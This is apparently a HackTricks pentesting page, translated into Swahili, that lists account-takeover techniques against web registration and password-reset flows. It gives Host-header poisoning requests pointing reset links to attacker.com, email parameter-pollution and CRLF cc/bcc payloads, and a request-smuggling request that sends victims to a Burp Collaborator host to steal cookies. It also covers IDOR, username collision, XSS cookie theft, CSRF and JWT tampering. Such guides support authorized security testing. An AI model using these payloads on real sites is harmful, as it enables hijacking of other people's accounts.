Usajili & Ukatili wa Akaunti
Reading time: 6 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Ukatili wa Usajili
Usajili wa Nakala
- Jaribu kuunda kwa kutumia jina la mtumiaji lililopo
- Angalia kubadilisha barua pepe:
- herufi kubwa
- +1@
- ongeza nukta katika barua pepe
- wahusika maalum katika jina la barua pepe (%00, %09, %20)
- Weka wahusika weusi baada ya barua pepe:
test@test.com a
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
Uainishaji wa Jina la Mtumiaji
Angalia kama unaweza kubaini wakati jina la mtumiaji tayari limesajiliwa ndani ya programu.
Sera ya Nywila
Unapounda mtumiaji angalia sera ya nywila (angalia kama unaweza kutumia nywila dhaifu).
Katika hali hiyo unaweza kujaribu kubruteforce akauti.
SQL Injection
Angalia ukurasa huu kujifunza jinsi ya kujaribu ukatili wa akaunti au kutoa taarifa kupitia SQL Injections katika fomu za usajili.
Oauth Ukatili
{{#ref}} oauth-to-account-takeover.md {{#endref}}
Ukatili wa SAML
{{#ref}} saml-attacks/ {{#endref}}
Badilisha Barua Pepe
Wakati wa usajili jaribu kubadilisha barua pepe na angalia kama mabadiliko haya yanathibitishwa kwa usahihi au unaweza kuyabadilisha kuwa barua pepe zisizo na mpangilio.
Ukaguzi Zaidi
- Angalia kama unaweza kutumia barua pepe za muda
- Nywila Ndefu (>200) inasababisha DoS
- Angalia mipaka ya viwango kwenye uundaji wa akaunti
- Tumia username@burp_collab.net na uchambue callback
Ukatili wa Kurekebisha Nywila
Kuvuja kwa Tokeni ya Kurekebisha Nywila Kupitia Referrer
- Omba kurekebisha nywila kwa anwani yako ya barua pepe
- Bonyeza kwenye kiungo cha kurekebisha nywila
- Usibadilishe nywila
- Bonyeza tovuti zozote za 3rd party (mfano: Facebook, twitter)
- Intercept ombi katika Burp Suite proxy
- Angalia kama kichwa cha referer kinavuja tokeni ya kurekebisha nywila.
Ukatili wa Kurekebisha Nywila kwa Kutoa Mchafuko
- Intercept ombi la kurekebisha nywila katika Burp Suite
- Ongeza au hariri vichwa vifuatavyo katika Burp Suite:
Host: attacker.com
,X-Forwarded-Host: attacker.com
- Tuma ombi na kichwa kilichobadilishwa
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
- Tafuta URL ya kurekebisha nywila kulingana na kichwa cha host kama:
https://attacker.com/reset-password.php?token=TOKEN
Kurekebisha Nywila Kupitia Kigezo cha Barua Pepe
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
IDOR on API Parameters
- Mshambuliaji lazima aingie kwenye akaunti yao na aende kwenye kipengele cha Badilisha nenosiri.
- Anza Burp Suite na uingilie ombi hilo.
- Tuma kwenye tab ya repeater na uhariri vigezo: User ID/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Weak Password Reset Token
Token ya kubadilisha nenosiri inapaswa kuundwa kwa bahati nasibu na kuwa ya kipekee kila wakati.
Jaribu kubaini kama token hiyo inaisha muda au kama kila wakati ni ile ile, katika baadhi ya matukio algorithm ya uzalishaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithm.
- Timestamp
- UserID
- Barua pepe ya Mtumiaji
- Jina la Kwanza na Jina la Mwisho
- Tarehe ya Kuzaliwa
- Cryptography
- Nambari pekee
- Mfululizo mdogo wa token (herufi kati ya [A-Z,a-z,0-9])
- Tumia tena token
- Tarehe ya kumalizika kwa token
Leaking Password Reset Token
- Trigger ombi la kubadilisha nenosiri kwa kutumia API/UI kwa barua pepe maalum e.g: test@mail.com
- Kagua jibu la seva na angalia
resetToken
- Kisha tumia token hiyo katika URL kama
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Password Reset Via Username Collision
- Jisajili kwenye mfumo kwa jina la mtumiaji linalofanana na jina la mtumiaji wa mwathirika, lakini ukiweka nafasi za wazi kabla na/au baada ya jina la mtumiaji. e.g:
"admin "
- Omba kubadilisha nenosiri kwa kutumia jina lako la mtumiaji la uhalifu.
- Tumia token iliyotumwa kwa barua pepe yako na ubadilishe nenosiri la mwathirika.
- Unganisha kwenye akaunti ya mwathirika kwa nenosiri jipya.
Jukwaa la CTFd lilikuwa na udhaifu kwa shambulio hili.
Tazama: CVE-2020-7245
Account Takeover Via Cross Site Scripting
- Pata XSS ndani ya programu au subdomain ikiwa vidakuzi vimewekwa kwenye kikoa cha domain ya mzazi:
*.domain.com
- Leak vidakuzi vya sasa vya sessions
- Thibitisha kama mtumiaji kwa kutumia cookie
Account Takeover Via HTTP Request Smuggling
1. Tumia smuggler kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Tengeneza ombi ambalo litabadilisha POST / HTTP/1.1
na data ifuatayo:
GET http://something.burpcollaborator.net HTTP/1.1 X:
kwa lengo la kufungua upya wa mwathirika kwenda burpcollab na kuiba vidakuzi vyao
3. Ombi la mwisho linaweza kuonekana kama ifuatavyo
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hackerone inaripoti kutumia hitilafu hii
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
Account Takeover via CSRF
- Tengeneza payload kwa ajili ya CSRF, e.g: “HTML form with auto submit for a password change”
- Tuma payload
Account Takeover via JWT
JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
- Hariri JWT na User ID / Email nyingine
- Angalia kwa saini dhaifu ya JWT
{{#ref}} hacking-jwt-json-web-tokens.md {{#endref}}
References
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.